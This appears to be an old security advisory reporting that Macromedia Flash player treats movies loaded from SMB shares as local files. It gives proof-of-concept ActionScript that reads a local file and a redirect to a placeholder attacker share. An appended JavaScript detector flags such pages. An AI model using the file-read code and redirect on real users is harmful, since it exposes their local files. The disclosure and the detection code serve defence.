The following message apparently bounced the first time I sent it :s

Flash player can read local files

Description

There is a flaw in the Macromedia Flash player which allows reading and sending of local files.

The flaw lies in the fact that when a Flash movie is loaded from a remote SMB share, it is treated as though it was loaded from the user's hard disk, allowing the following ActionScript code to work:

    urlXML = new XML();
    urlXML.onLoad = readXML;
    myField = "Loading data...";
    // Load a file from the viewer's local disk
    urlXML.load("file:///C:/jelmer.txt");

    // Called when loading finishes; puts the file contents into the text field
    function readXML() {
        myField = urlXML.toString();
    }

It uses Flash's XML control to read and display the contents of c:\jelmer.txt.

In order for it to work, one has to get a user to view a specially crafted webpage, which could look like this:

    <script language="javascript">
    document.location.href='\\\\HOST_IP\\exploit\\read.swf';
    </script>

It points the browser to the SWF on the SMB share so that it displays it.

Demonstration

Download the following file and extract the contained SWF to a remote share, then start it from there (for instance by dragging it from the share into Explorer or creating an HTML file as described above):

http://www.xs4all.nl/~jkuperus/exploit.zip

It will read and display the contents of c:\jelmer.txt.

A live demonstration is not provided because it really isn't good practice to open up SMB shares to the outside world and I am only able to host this sort of stuff at my home server.

Vendor status

Macromedia was notified a long time ago; as far as I know they are still looking into it.
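
On the defensive side, a mail or web content filter can flag pages that send the browser to a .swf on an SMB share, which is the delivery step described above. The following is an added example, not code from the original post; `findRemoteSwfTargets` and the sample hosts are hypothetical, and it goes beyond the post's JavaScript-escaped form by also covering raw UNC paths and `file:` URLs that carry a host.

```javascript
// Added example, not code from the original post. Host names and file names in
// SAMPLES are constructed; findRemoteSwfTargets is a hypothetical helper name.

// UNC path, raw (\\host\share\x.swf) or JavaScript-escaped (\\\\host\\share\\x.swf).
// The lookbehind requires the path to start a token, so separators inside a
// local path such as C:\\dir\\sub\\x.swf are not mistaken for a UNC prefix.
const UNC_SWF =
  /(?<![\\:\w.-])(?:\\{4}|\\{2})([\w.-]+)((?:\\{1,2}[^\\\s"'<>]+)+?\.swf)\b/gi;

// file: URL with a host part (file://host/... or file:////host/...), which
// Windows resolves to \\host\... ; file:///C:/... has no host and is skipped.
const FILE_URL_SWF =
  /file:\/\/(?:\/{2,3})?([\w.-]+)((?:\/[^\/\s"'<>]+)+?\.swf)\b/gi;

// Return the normalised UNC targets (\\host\share\file.swf) referenced in html.
function findRemoteSwfTargets(html) {
  const targets = new Set();
  for (const m of html.matchAll(UNC_SWF)) {
    // Collapse escaped separators (\\) to single backslashes.
    targets.add("\\\\" + m[1] + m[2].replace(/\\+/g, "\\"));
  }
  for (const m of html.matchAll(FILE_URL_SWF)) {
    // Convert URL separators to UNC separators.
    targets.add("\\\\" + m[1] + m[2].replace(/\//g, "\\"));
  }
  return [...targets];
}

// Constructed sample pages (String.raw keeps the backslashes as written).
const SAMPLES = [
  String.raw`<script>document.location.href='\\\\HOST_IP\\exploit\\read.swf';</script>`,
  String.raw`<embed src="\\fileserver\media\intro.swf">`,
  `<a href="file:////fileserver/media/intro.swf">intro</a>`,
  `<embed src="file:///C:/movies/intro.swf">`,      // local file, not flagged
  `<embed src="http://www.example.com/intro.swf">`, // plain HTTP, not flagged
];

for (const page of SAMPLES) {
  console.log(findRemoteSwfTargets(page));
}
```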